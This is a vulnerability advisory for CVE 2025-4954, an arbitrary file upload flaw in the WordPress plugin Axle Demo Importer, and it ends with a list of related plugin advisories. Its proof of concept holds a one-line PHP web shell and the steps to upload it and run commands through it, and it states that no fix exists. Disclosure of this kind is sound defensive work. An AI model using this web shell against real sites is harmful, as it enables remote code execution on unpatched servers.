Axle Demo Importer <= 1.0.3 – Author+ Arbitrary File Upload | CVE 2025-4954 | Plugin Vulnerabilities

Description

The plugin does not validate files to be uploaded, which could allow authenticated users (author and above) to upload arbitrary files such as PHP on the server

Proof of Concept

Create a malicious PHP file:

`<?php echo "Nxploit OK - "; system($_GET['cmd']); ?>`

Add it to a ZIP archive ( zip exploit.zip shell.php )

Log in as any WordPress user with upload_files capability (Author+)

Upload the ZIP file via
http://example.com/wp-admin/themes.php?page=axle-demo-importer

Access the web shell:
http://example.com/wp-content/uploads/axle-demo-importer-tmp/shell.php?cmd=id

Affects Plugins

axle-demo-importer

No known fix

References

CVE

Miscellaneous

Original Researcher

Khaled Alenazi (Nxploited)

Submitter

Khaled Alenazi (Nxploited)

Submitter website

https://github.com/Nxploited

Verified

Yes

WPVDB ID

673f35ff-e1d5-4099-86e7-8b6e3e410ef8

Timeline

Publicly Published

2025-05-20 (about 7 months ago)

Added

2025-05-20 (about 7 months ago)

Last Updated

2025-05-20 (about 7 months ago)

Other

Published

Title

Published

2017-02-28

Title

Mobile App Native <= 3.0 - Remote File Upload

Published

2014-08-01

Title

WPtouch 3.x - Insecure Nonce Generation

Published

2024-10-30

Title

Training – Courses <= 2.0.1 - Authenticated (Subscriber+) Arbitrary File Upload

Published

2015-02-12

Title

Photo Gallery <= 1.2.5 - Unrestricted File Upload

Published

2025-06-11

Title

Reformer for Elementor <= 1.0.5 - Unauthenticated Arbitrary File Upload